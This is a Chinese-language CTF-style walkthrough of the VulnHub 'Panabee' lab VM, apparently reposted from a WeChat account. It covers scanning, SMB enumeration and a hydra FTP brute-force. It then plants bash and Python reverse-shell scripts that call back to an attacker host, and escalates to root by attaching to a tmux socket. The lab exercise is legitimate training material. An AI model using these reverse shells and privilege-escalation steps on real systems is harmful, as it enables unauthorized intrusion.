今天实践的是vulnhub的Panabee镜像,
下载地址,https://download.vulnhub.com/panabee/Panabee.ova,
用workstation导入,直接能看到地址,
继续进行端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.150,
有smb服务,尝试匿名连接,smbclient -L 192.168.58.150,
进一步连接note目录,smbclient \\192.168.58.150\note,
下载note.txt,查看发现goper账户的提示,以及文件backup的提示,
爆破ftp服务,得到密码,spiderman,
hydra -l goper -P /usr/share/wordlists/rockyou.txt 192.168.58.150 ftp,
ftp登录192.168.58.150,
下载bash历史记录,
查看分析出文件备份的脚本是/home/goper/backup.sh,
构造backup.sh,内容是反弹shell脚本,
#!/bin/bash
bash -i >& /dev/tcp/192.168.58.151/4444 0>&1
通过ftp上传,上传之前在kali攻击机上开个反弹shell监听,nc -lvp 4444,
获取到反弹shell,sudo -l查看到jenny账户权限执行的程序,
构造status.py,内容是反弹shell脚本,
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.58.151",8888))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
通过ftp上传,上传之前注意拿掉当前已经存在的status.py,
mv /home/goper/status.py /home/goper/status.py.bak,
改权限,chmod 777 /home/goper/status.py,
kali攻击机上再开个反弹shell监听,nc -lvp 8888,
执行,sudo -u jenny /usr/bin/python3 /home/goper/status.py,
获取到另一个反弹shell,id确认不是root,继续提权,
下载pspy64程序,cd /tmp,
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64,
改权限,chmod 777 pspy64,执行,./pspy64,
查看到tmux进程,
切换到交换式shell,python3 -c 'import pty; pty.spawn("/bin/bash")',
执行,export TERM=xterm,
tmux -S /opt/.tmux-0/sockets/default attach,
得到新的shell,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之Panabee的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论